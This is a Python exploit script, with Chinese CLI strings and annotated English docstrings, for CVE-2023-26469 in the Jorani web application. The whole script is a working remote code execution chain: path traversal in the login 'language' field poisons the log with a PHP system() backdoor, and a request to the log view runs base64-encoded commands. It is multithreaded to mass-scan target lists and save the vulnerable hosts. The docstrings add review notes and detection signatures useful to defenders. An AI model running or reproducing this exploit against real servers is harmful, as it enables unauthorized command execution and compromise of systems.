Jorani_CVE-2023-26469_exp.py
# 作者: VulnExpo
# 日期: 2023-11-13
import argparse
import threading
import requests
import datetime
import re
import base64
import random
import string
# Silence urllib3's InsecureRequestWarning for the whole run: check_for_vulnerability
# below issues its first GET with verify=False, so without this every target
# probed over HTTPS would print a per-request warning to stderr.
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
def check_for_vulnerability(url: str, proxies: dict[str, str] | None = None, success_file: str | None = None) -> bool | None:
    """Probe one Jorani instance for CVE-2023-26469 and record a positive result.

    The probe is a log-poisoning chain made of three requests against ``url``:
    a GET of the login page to harvest the CSRF token, a login POST whose
    ``language`` field carries a path-traversal string and whose ``login``
    field carries a PHP fragment (so the failed-login entry lands in the
    application log), and a GET of today's log through ``/pages/view/`` with
    a custom header that the fragment reads.  Command output is recovered
    from between the ``---------`` delimiters in the response body.

    Args:
        url: Base URL of the target; the paths in ``URLS`` are appended
            verbatim, so it should carry the scheme and host without a
            trailing slash.
        proxies: Accepted for the CLI's ``-p`` option but never applied —
            NOTE(review): ``session.proxies`` is not set and no request
            passes ``proxies=``, so traffic always goes direct.
        success_file: Path appended to when command output was found.  With
            the default ``None``, ``open()`` raises ``TypeError``, which the
            inner ``except`` prints and swallows.

    Returns:
        ``False`` when the result-handling step raised (no output captured,
        or the success file could not be written); ``None`` otherwise,
        including when the outer ``except`` swallowed a network or parsing
        error.  The return value therefore does not tell "vulnerable" apart
        from "unreachable".

    Defender notes: the on-the-wire signatures of this script are the
    traversal value ``../../application/logs`` in the ``language`` login
    parameter, a ``<?php`` fragment in the ``login`` parameter, and a follow-up
    ``/pages/view/log-YYYY-MM-DD`` request carrying
    ``X-REQUESTED-WITH: XMLHttpRequest`` plus a random 12-letter uppercase
    header.  The success file is opened in append mode by several threads at
    once (see ``multi_threaded_scan``) with no lock.

    NOTE(review): the source was flattened (no indentation); ``return False``
    is placed inside the inner ``except`` here, which is the reading that
    makes the "success" path return ``None`` — confirm against upstream.
    """
    try:
        # Regex for the CSRF hidden field on the login page, and for the
        # delimiters the command header wraps around the command output.
        CSRF_PATTERN = re.compile('<input type="hidden" name="csrf_test_jorani" value="(.*?)"')
        CMD_PATTERN = re.compile('---------(.*?)---------', re.S)
        # Target URL paths, appended to `url` as-is.
        URLS = {
            'login': '/session/login',
            'view': '/pages/view/',
        }
        # Random 12-letter uppercase header name.  `random` is not a CSPRNG,
        # but nothing here relies on the name being unpredictable.
        def generate_random_header_name():
            alphabet = string.ascii_uppercase
            return ''.join(random.choice(alphabet) for i in range(12))
        HEADER_NAME = generate_random_header_name()
        # PHP fragment written into the log; it executes the base64-decoded
        # value of the HTTP_<HEADER_NAME> request header when that header is set.
        POISON_PAYLOAD = "<?php if(isset($_SERVER['HTTP_" + HEADER_NAME + "'])){system(base64_decode($_SERVER['HTTP_" + HEADER_NAME + "']));} ?>"
        PATH_TRAV_PAYLOAD = "../../application/logs"
        command = "id"
        # Fresh session; the first GET disables TLS verification, the later
        # POST and GET do not pass verify= and use the session default.
        session = requests.Session()
        # print("Requesting session cookie")
        response = session.get(url + URLS['login'], verify=False)
        cookies = session.cookies.get_dict()  # assigned but not used below
        # Extract the CSRF token; an IndexError here (no token on the page,
        # e.g. a non-Jorani host) lands in the outer except.
        csrf_token = re.findall(CSRF_PATTERN, response.text)[0]
        # print(f"Poisoning log file with payload: '{POISON_PAYLOAD}'")
        # print(f"Setting path traversal to '{PATH_TRAV_PAYLOAD}'")
        # print(f"Recovered CSRF Token: {csrf_token}")
        # Login POST: `language` carries the traversal, `login` the PHP fragment.
        data = {
            "csrf_test_jorani": csrf_token,
            "last_page": "session/login",
            "language": PATH_TRAV_PAYLOAD,
            "login": POISON_PAYLOAD,
            "CipheredValue": "DummyPassword"
        }
        session.post(url + URLS['login'], data=data)
        # Log name uses the scanner's local date; assumes the server's log
        # for "today" carries the same date — TODO confirm across time zones.
        log_file_name = f"log-{datetime.date.today().isoformat()}"
        # Headers for the view GET: X-REQUESTED-WITH plus the command header,
        # whose value is base64 of an echo/command/echo sequence so the
        # output is delimited for CMD_PATTERN.
        BypassRedirect = {
            'X-REQUESTED-WITH': 'XMLHttpRequest',
            HEADER_NAME: base64.b64encode(f"echo ---------;{command} 2>&1;echo ---------;".encode()).decode()
        }
        response = session.get(url + URLS['view'] + log_file_name, headers=BypassRedirect)
        command_output = re.findall(CMD_PATTERN, response.text)
        try:
            # command_output[0] raises IndexError when no delimited output
            # came back; that is the "not vulnerable / not exploitable" path.
            print(f"目标 {url} 响应内容 {command_output[0].strip()}")
            with open(success_file, 'a') as s_file:
                s_file.write(f"++++++++++++++++++\n")
                s_file.write(f"目标URL: {url}\n")
                s_file.write(f"响应内容: {command_output[0].strip()}\n\n")
        except Exception as e:
            print(f"目标 {url} 发生异常:{e}")
            return False
    except Exception as e:
        # Network errors, missing CSRF token, etc. are printed and swallowed;
        # the function then returns None.
        print(f"目标 {url} 发生异常:{e}")
def scan_targets(targets, proxies=None, success_file=None):
    """Probe every entry of *targets* one after another.

    Each entry is stripped of surrounding whitespace (the list usually comes
    straight from ``readlines()`` and still carries newlines) and handed to
    ``check_for_vulnerability``; the probe's return value is discarded.

    Args:
        targets: Iterable of target base URLs.
        proxies: Passed through to ``check_for_vulnerability`` unchanged.
        success_file: Passed through to ``check_for_vulnerability`` unchanged.
    """
    for raw_target in targets:
        cleaned = raw_target.strip()
        check_for_vulnerability(cleaned, proxies, success_file)
def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4):
    """Distribute *urls* round-robin over *num_threads* threads and wait for all.

    Worker ``i`` receives the slice ``urls[i::num_threads]``; with more
    threads than URLs the surplus workers get an empty slice and return at
    once.  All threads are created first, then started, then joined in
    creation order, so the call returns only when every probe has finished.
    A ``num_threads`` of zero or less creates no threads and is a no-op.

    Args:
        urls: Sequence of target base URLs (must support extended slicing).
        proxies: Passed through to ``scan_targets`` unchanged.
        success_file: Passed through to ``scan_targets`` unchanged.
        num_threads: Number of worker threads to spawn.
    """
    workers = [
        threading.Thread(
            target=scan_targets,
            args=(urls[worker_idx::num_threads], proxies, success_file),
        )
        for worker_idx in range(num_threads)
    ]
    for worker in workers:
        worker.start()
    for worker in workers:
        worker.join()
if __name__ == '__main__':
    # Command-line front end: a single target via -u, otherwise a file with
    # one target per line (default url.txt).
    cli = argparse.ArgumentParser(description="Jorani远程命令执行漏洞CVE-2023-26469")
    cli.add_argument("-u", "--url", help="目标URL")
    cli.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt")
    cli.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4")
    cli.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)")
    args = cli.parse_args()

    if args.url:
        urls = [args.url]
    elif args.file:
        # Lines keep their trailing newline here; scan_targets strips them.
        with open(args.file, 'r') as url_list:
            urls = url_list.readlines()
    else:
        # Only reached when -u is absent and -f was explicitly given as empty,
        # since --file otherwise defaults to url.txt.
        print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。")
        exit(1)

    success_file = 'success_targets.txt'
    # NOTE: the proxy mapping is built here but check_for_vulnerability never
    # attaches it to its requests.Session, so -p currently has no effect.
    proxies = None
    if args.proxy:
        proxies = {
            "http": args.proxy,
            "https": args.proxy
        }
    multi_threaded_scan(urls, proxies, success_file, args.threads)
    print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。")